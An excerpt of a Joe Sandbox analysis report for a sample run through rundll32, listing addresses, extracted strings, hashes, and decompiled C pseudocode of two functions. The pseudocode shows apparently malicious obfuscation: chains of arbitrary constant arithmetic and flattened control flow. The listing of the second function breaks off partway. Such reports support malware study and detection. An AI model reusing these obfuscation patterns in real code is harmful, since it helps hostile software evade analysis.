0x00204dbc
0x00204dc4
0x00204dc9
0x00204dd1
0x00204dd9
0x00204de5
0x00204de8
0x00204dec
0x00204df4
0x00204dfc
0x00204e04
0x00204e09
0x00204e0e
0x00204e16
0x00204e21
0x00204e29
0x00204e34
0x00204e3c
0x00204e44
0x00204e49
0x00204e51
0x00204e64
0x00204e6b
0x00204e76
0x00204e7e
0x00204e86
0x00204e8e
0x00204e96
0x00204e9e
0x00204ea6
0x00204eae
0x00204eb6
0x00204ec1
0x00204ecc
0x00204ed7
0x00204ee4
0x00204eef
0x00204efa
0x00204f02
0x00204f0a
0x00204f12
0x00204f1a
0x00204f22
0x00204f27
0x00204f2c
0x00204f34
0x00204f3c
0x00204f4a
0x00204f4f
0x00204f5a
0x00204f5b
0x00204f5f
0x00204f67
0x00204f72
0x00204f7d
0x00204f88
0x00204f93
0x00204f9e
0x00204fa9
0x00204fb4
0x00204fbf
0x00204fca
0x00204fd7
0x00204fdb
0x00204fe3
0x00204fe8
0x00204ff0
0x00204ffb
0x00205003
0x0020500e
0x00205019
0x00205021
0x0020502c
0x00205034
0x0020503c
0x00205044
0x00205049
0x00205051
0x00205059
0x00205063
0x00205067
0x0020506f
0x00205077
0x00205082
0x0020508d
0x00205098
0x002050a0
0x002050a5
0x002050ad
0x002050b5
0x002050c0
0x002050cb
0x002050d6
0x002050e1
0x002050ee
0x002050f2
0x002050fa
0x00205102
0x0020510a
0x00205118
0x00205121
0x00205125
0x0020512d
0x00205135
0x0020513d
0x00205142
0x00205155
0x0020515a
0x00205161
0x00205163
0x0020516a
0x0020516a
0x0020516a
0x0020516f
0x0020516f
0x0020516f
0x0020516f
0x00205175
0x00000000
0x00000000
0x0020517b
0x00000000
0x002054f8
0x00205187
0x00205193
0x002052e9
0x002052ef
0x002052f0
0x0020516a
0x0020516a
0x0020516a
0x00000000
0x0020516a
0x00205199
0x0020519f
0x002052ad
0x002052b8
0x002052bd
0x002052bf
0x002052c2
0x002052c9
0x002052ce
0x00000000
0x002051a5
0x002051ab
0x0020525c
0x0020525d
0x0020526d
0x0020526f
0x00205277
0x00205279
0x0020527d
0x00205284
0x00205285
0x0020528a
0x0020528d
0x0020516a
0x0020516a
0x0020516a
0x00000000
0x0020516a
0x002051b1
0x002051b3
0x002051e0
0x0020522f
0x00205234
0x0020524b
0x00205251
0x00205252
0x0020516a
0x0020516a
0x0020516a
0x00000000
0x0020516a
0x002051b5
0x002051bb
0x00000000
0x002051c1
0x002051d3
0x002051d8
0x002051d9
0x0020516a
0x0020516a
0x0020516a
0x00000000
0x0020516a
0x0020516a
0x002051bb
0x002051b3
0x002051ab
0x0020519f
0x002053b2
0x002053b2
0x002053b2
0x0020530c
0x00205310
0x00205311
0x00205316
0x00205319
0x0020531a
0x0020531c
0x00205322
0x00205323
0x00205342
0x0020534a
0x0020534f
0x00205352
0x0020516a
0x0020516a
0x0020516a
0x00000000
0x0020516a
0x0020516a
0x00000000
0x0020531c
0x0020535c
0x00205362
0x002054bd
0x002054c4
0x002054c9
0x00000000
0x00205368
0x00205368
0x0020536e
0x00205439
0x00205440
0x00205445
0x0020545c
0x00205490
0x00205495
0x0020549a
0x0020549c
0x00000000
0x00205374
0x00205374
0x0020537a
0x00205404
0x0020540c
0x00205414
0x00205415
0x00000000
0x0020537c
0x0020537c
0x00205382
0x002053c8
0x002053ce
0x002053d6
0x002053d8
0x002053d9
0x002053d9
0x002053df
0x002053df
0x0020516a
0x0020516a
0x0020516a
0x00000000
0x0020516a
0x00205384
0x00205384
0x0020538a
0x00205397
0x0020539a
0x0020539f
0x002053a2
0x00000000
0x002053a2
0x00000000
0x0020538a
0x00205382
0x0020537a
0x0020536e
0x00000000
0x002054ce
0x002054ce
0x002054ce
0x00000000
0x0020516f

Strings

>], xrefs: 00204CE4
*X, xrefs: 00204B23
e!, xrefs: 00205102
-*, xrefs: 00204FB4
Kc, xrefs: 00205051
U$, xrefs: 0020502C
;x, xrefs: 00204D93
][, xrefs: 0020512D
6T-, xrefs: 00204CD9
`+, xrefs: 00204B4E
P, xrefs: 00204A5C
h=, xrefs: 00204BAB
WM, xrefs: 00204B8D

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
API String ID: 0-2931794159
Opcode ID: 6a297386db884dd6739acc7aa284339fa45f9822bff575fbf2cd2381693533d8
Instruction ID: 3dd7ecb2b08342e77284c8c0ac659698373ff0e5e2951c1768ed2f595486b19e
Opcode Fuzzy Hash: 6a297386db884dd6739acc7aa284339fa45f9822bff575fbf2cd2381693533d8
Instruction Fuzzy Hash: 73322271518781CFE3B8CF21C54AA8BBBE1BBC4304F108A1DE5DA962A0D7B59859CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00208F78, Relevance: 15.4, Strings: 12, Instructions: 367
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00208F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E0020BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E00214F7D(_v552, _v580, _v540);
										E00214F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E00214F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E0020F536(_v624, _v632, _v648, _t444);
									}
									if(_t445 == 0x1b7bc3fb) {
										E0020F326();
										E0020F6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E002017AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0x21c910);
												_t378 = E002088E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E00214F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E0020568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E00214F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E00208736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0x21ca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0x21ca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}

0x00208f78
0x00208f7e
0x00208f86
0x00208f8e
0x00208f96
0x00208f9b
0x00208fa3
0x00208fab
0x00208fb3
0x00208fb8
0x00208fbd
0x00208fc5
0x00208fcd
0x00208fd5
0x00208fdd
0x00208fea
0x00208ff1
0x00208ff7
0x00208ffc
0x00209001
0x00209007
0x0020900f
0x00209017
0x0020901f
0x00209024
0x0020902c
0x00209039
0x0020903c
0x00209040
0x00209048
0x00209050
0x0020905b
0x00209066
0x00209071
0x0020907c
0x00209087
0x00209092
0x0020909a
0x002090a2
0x002090a7
0x002090af
0x002090b7
0x002090bf
0x002090c7
0x002090cf
0x002090df
0x002090e8
0x002090eb
0x002090ef
0x002090f4
0x002090fc
0x00209104
0x0020910f
0x00209113
0x0020911b
0x00209123
0x0020912b
0x00209133
0x00209138
0x00209140
0x00209148
0x00209156
0x0020915b
0x00209161
0x00209169
0x00209176
0x00209179
0x0020917d
0x0020918d
0x00209191
0x00209199
0x002091a1
0x002091a6
0x002091ae
0x002091b3
0x002091bb
0x002091c8
0x002091cb
0x002091cf
0x002091d7
0x002091df
0x002091ea
0x002091f5
0x00209200
0x0020920b
0x00209213
0x0020921e
0x00209226
0x00209233
0x00209237
0x0020923f
0x00209247
0x0020924c
0x00209251
0x00209259
0x00209264
0x0020926f
0x0020927a
0x00209285
0x0020928d
0x00209298
0x002092a3
0x002092ae
0x002092b9
0x002092c1
0x002092c9
0x002092d1
0x002092d9
0x002092e6
0x002092e7
0x002092eb
0x002092f3
0x002092fb
0x00209309
0x0020930d
0x00209315
0x0020931d
0x00209325
0x0020932d
0x00209332
0x0020933a
0x00209342
0x0020934a
0x00209352
0x0020935a
0x00209362
0x0020936a
0x00209378
0x00209379
0x00209380
0x00209387
0x0020938b
0x00209393
0x0020939b
0x002093a0
0x002093a8
0x002093b0
0x002093b8
0x002093c2
0x002093c6
0x002093ce
0x002093d6
0x002093db
0x002093e3
0x002093eb
0x002093f3
0x002093fe
0x00209402
0x0020940a
0x00209417
0x0020941b
0x00209423
0x0020942b
0x00209433
0x00209433
0x00209433
0x00209438
0x00209438
0x00209438
0x0020943d
0x0020943d
0x0020943d
0x0020943d
0x0020943f
0x00000000
0x00000000
0x00209445
0x0020955a
0x0020955b
0x0020957f
0x00209584
0x00209589
0x0020959d
0x002095b5
0x002095ba
0x002095bb
0x002095c2
0x002095c9
0x002095d0
0x002095d0
0x002095d6
0x002095d6
0x00209433
0x00209433
0x00209433
0x00000000
0x00209433
0x0020944b
0x00209451
0x00000000
0x002096c1
0x0020945d
0x0020952e
0x00209535
0x00209541
0x00209546
0x0020954b
0x00000000
0x00209463
0x00209469
0x002094d8
0x00209511
0x00000000
0x002094da
0x002094da
0x002094e5
0x002094e7
0x002094f4
0x002094f9
0x002094fe
0x00209506
0x00209433
0x00209433
0x00209433
0x00209438
0x00209438
0x00000000
0x00209438
0x00209433
0x0020946b
0x00209471
0x00000000
0x00209477
0x00209485
0x00209486
0x0020948d
0x00209495
0x0020949b
0x002094b0
0x002094c1
0x002094c7
0x002094c7
0x002094cc
0x00209438
0x00209438
0x00209438
0x00000000
0x00209438
0x0020949d
0x002094a4
0x002094a9
0x00000000
0x002094a9
0x0020949b
0x00209471
0x00209469
0x0020945d
0x002095ec
0x002095f2
0x002095fa
0x00000000
0x00209600
0x00209600
0x00209601
0x0020960e
0x0020960f
0x0020960f
0x0020961a
0x0020961b
0x00209626
0x00209628
0x0020962d
0x00209632
0x00000000
0x00209634
0x00209643
0x00209648
0x0020964d
0x00209654
0x00000000
0x00209654
0x00000000
0x00209632
0x002096cc
0x002096cc
0x002096cc
0x0020965d
0x00209669
0x0020966a
0x0020966d
0x0020966e
0x00209673
0x00209679
0x0020967b
0x00000000
0x0020967b
0x00000000
0x00209679
0x002095e6
0x00209685
0x00209688
0x0020968d
0x00209692
0x00209695
0x0020969a
0x00000000
0x0020969a
0x00000000
0x002096a0
0x002096a0
0x00000000
0x0020943d
0x00209438

Strings

}a, xrefs: 00209325
G1, xrefs: 00209362
b{, xrefs: 002092A3
]V, xrefs: 00209050
Ml!, xrefs: 002094E7
@C, xrefs: 002092D9
-, xrefs: 00209342
#, xrefs: 002093CE
fpMl!, xrefs: 0020960F
s5, xrefs: 0020921E
~\, xrefs: 002091DF
`H, xrefs: 002092FB

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
API String ID: 0-964951681
Opcode ID: 81ac7b900a8f86cb49a46233d9ed28990a255b019207337129634b580e83c9db
Instruction ID: 1eb6febfaaa0da2473a1fb92e489488db3245381002766823ffaed1da37ad498
Opcode Fuzzy Hash: 81ac7b900a8f86cb49a46233d9ed28990a255b019207337129634b580e83c9db
Instruction Fuzzy Hash: 1C02617250D3818FE368CF25D58AA4BBBF1BBC4708F50891DF19A862A1D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020E377, Relevance: 15.3, Strings: 12, Instructions: 321
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0020E377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
